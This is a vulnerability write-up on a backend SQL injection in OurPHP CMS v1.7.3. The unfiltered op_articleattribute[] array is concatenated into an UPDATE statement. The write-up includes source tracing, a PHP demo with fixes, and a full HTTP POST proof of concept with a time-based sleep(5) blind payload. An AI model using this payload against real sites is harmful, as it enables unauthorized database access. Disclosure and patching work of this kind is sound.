Version
<?php
/*
 * OURPHP-CMS Building Station System
 * COPYRIGHT (C) www.ourphp.net
 * Developer: Harbin Wei Cheng Technology Co., Ltd.
 */
$ourphp_version     = "v1.7.3";
$ourphp_versiondate = "20170615";
$ourphp_weixin      = "Close";
$ourphp_apps        = "Close";
$ourphp_alifuwu     = "Close";
?>
First, look at index.php.
It loads the following files:
include './config/ourphp_code.php';
include './config/ourphp_config.php';
include './config/ourphp_version.php';
include './config/ourphp_language.php';
include './function/ourphp_function.class.php';
include './function/ourphp/smarty.class.php';
include './function/ourphp_system.class.php';
include './function/ourphp_template.class.php';
ourphp_function.class.php holds the input-filtering functions (admin_sql among them).
Bulk-search the code base for $_POST.
One of the hits is worth following up:
\client\manage\ourphp_articleview.php, line 71
$query = $dbUpdate("`ourphp_article`",
    "`op_articletitle` = '" . admin_sql($_POST["op_articletitle"]) . "', " .
    "`op_articleauthor` = '" . admin_sql($_POST["op_articleauthor"]) . "', " .
    "`op_articlesource` = '" . admin_sql($_POST["op_articlesource"]) . "', " .
    "`time` = '" . date("Y-m-d h:i:s") . "', " .
    "`op_articlecontent` = '" . admin_sql($_POST["op_articlecontent"]) . "', " .
    "`op_tag` = '" . $wordtag . "', " .
    "`op_class` = '" . $op_articleclass[0] . "', " .
    "`op_lang` = '" . $op_articleclass[1] . "', " .
    "`op_sorting` = '" . admin_sql($_POST["op_articlesorting"]) . "', " .
    "`op_attribute` = '" . $op_articleattribute . "', " .
    "`op_url` = '" . admin_sql($_POST["op_articleurl"]) . "', " .
    "`op_description` = '" . compress_html($op_articlecontent) . "', " .
    "`op_minimg` = '" . $op_minimg . "'",
    "where id = " . intval($_GET['id']));
Most of the parameters pass through admin_sql before being concatenated, but $op_articleattribute is concatenated into the statement without it (as are $wordtag, $op_articleclass and $op_minimg, which are not examined here).
Searching for where $op_articleattribute is assigned finds:
\client\manage\ourphp_articleview.php, lines 47-51
if (!empty($_POST["op_articleattribute"])) {
    $op_articleattribute = implode(',', $_POST["op_articleattribute"]);
} else {
    $op_articleattribute = '';
}
So it is not filtered at all: the array elements from $_POST are joined with implode() and the result goes straight into the UPDATE statement.
This injection point sits in an UPDATE whose result is not echoed back to the page, so error-based injection is not an option here; a time-based blind payload (sleep()) is used instead.
From the code above, op_articleattribute is expected to be submitted as an array (op_articleattribute[0], op_articleattribute[1], ...), and each element is taken verbatim.
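To make the defect concrete, here is a stand-alone PHP sketch (an added example, not OurPHP's own code) that reproduces the implode-and-concatenate pattern from lines 47-51 and 71 against a constructed request body carrying the POC payload, next to two ways of closing the hole. The admin_sql() stand-in, the $conn handle and the request body are all assumptions for the demo; the CMS's real admin_sql() implementation is not shown on this page.

```php
<?php
// Added example, not OurPHP code. Reproduces the injection point in
// ourphp_articleview.php and shows two fixes. The stand-in admin_sql(),
// the request body and the mysqli handle are constructed for the demo.

// Stand-in for the CMS's admin_sql() filter so this file runs on its own.
// addslashes() is only a placeholder here, not a recommended filter.
if (!function_exists('admin_sql')) {
    function admin_sql(string $s): string { return addslashes($s); }
}

// Constructed request body: element [1] carries the POC payload.
// "-- -" is used so the rest of the original UPDATE (op_url, ... WHERE id) is commented out.
$postAttr = ["aaaaaaaaaaaaa", "xxxxxxxxx' where 1=1 and sleep(5)-- -"];
$id = 3;

// (a) Vulnerable: what lines 47-51 and 71 do. Elements are joined and
//     concatenated into the statement with no filtering at all.
function buildUpdateVulnerable(array $attrs, int $id): string {
    $op_articleattribute = implode(',', $attrs);
    return "UPDATE `ourphp_article` SET `op_attribute` = '" . $op_articleattribute
         . "' WHERE id = " . $id;
}

// (b) Same style as the rest of line 71: run the filter on every element
//     before joining. Non-array input is rejected rather than cast, so a
//     plain string cannot reach implode().
function buildUpdateFiltered($attrs, int $id): string {
    if (!is_array($attrs)) {
        throw new InvalidArgumentException('op_articleattribute must be an array');
    }
    $clean = array_map(fn($v) => admin_sql((string) $v), $attrs);
    return "UPDATE `ourphp_article` SET `op_attribute` = '" . implode(',', $clean)
         . "' WHERE id = " . $id;
}

// (c) Preferred: a prepared statement, so the value never becomes SQL text.
//     Needs a live mysqli handle; it is defined but not called in this demo.
function updateAttributePrepared(mysqli $conn, array $attrs, int $id): bool {
    $stmt  = $conn->prepare("UPDATE `ourphp_article` SET `op_attribute` = ? WHERE id = ?");
    $value = implode(',', array_map('strval', $attrs));
    $stmt->bind_param('si', $value, $id);
    return $stmt->execute();
}

echo "vulnerable: ", buildUpdateVulnerable($postAttr, $id), "\n";
echo "filtered:   ", buildUpdateFiltered($postAttr, $id), "\n";
```

Running it with `php` prints the vulnerable statement with the attacker's `where 1=1 and sleep(5)-- -` sitting inside the SQL as live syntax, while the filtered version keeps the quote escaped inside the string literal. Variant (b) is the smallest patch that matches the file's existing style; (c) is what a new code path should use, and it also makes the op_attribute value a bound parameter regardless of how many elements the array holds.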
The SQL statement captured for a normal request is:
UPDATE `ourphp_article` SET `op_articletitle` = 'World, Hello!', `op_articleauthor` = '', `op_articlesource` = '', `time` = '2017-08-10 12:05:16', `op_articlecontent` = 'World, Hello!', `op_tag` = '', `op_class` = '3', `op_lang` = 'cn', `op_sorting` = 'a', `op_attribute` = 'aaaaaaaaaaaaa,xxxxxxxxx', `op_url` = '', `op_description` = 'World, Hello!', `op_minimg` = 'skin/noimage.png' WHERE id = 3
A single quote in one of the op_articleattribute[] values closes the `op_attribute` string literal, and everything after it is parsed as SQL.
Finally, the POC:
POST /client/manage/ourphp_articleview.php?ourphp_cms=edit&id=3&page=1 HTTP/1.1
Host: localhost.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=pnti0rkun1s1rrqhhl9n6lqdr1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 484

op_articleclass=3%7ccn&op_articletitle=%e4%b8%96%e7%95%8c%ef%bc%8c%e4%bd%a0%e5%a5%bd%ef%bc%81&op_articleauthor=&op_articlesource=&a_upimg=skin%2fnoimage.png&op_articlecontent=%e4%b8%96%e7%95%8c%ef%bc%8c%e4%bd%a0%e5%a5%bd%ef%bc%81&op_articlesorting=99&op_articleurl=&op_articletag=&op_articledescription=%e4%b8%96%e7%95%8c%ef%bc%8c%e4%bd%a0%e5%a5%bd%ef%bc%81&submit=%e6%8f%90%2b%e4%ba%a4&op_articleattribute[0]=aaaaaaaaaaaaa&op_articleattribute[1]=xxxxxxxxx' where 1=1 and sleep(5)---
OurPHP latest version (v1.7.3): backend SQL injection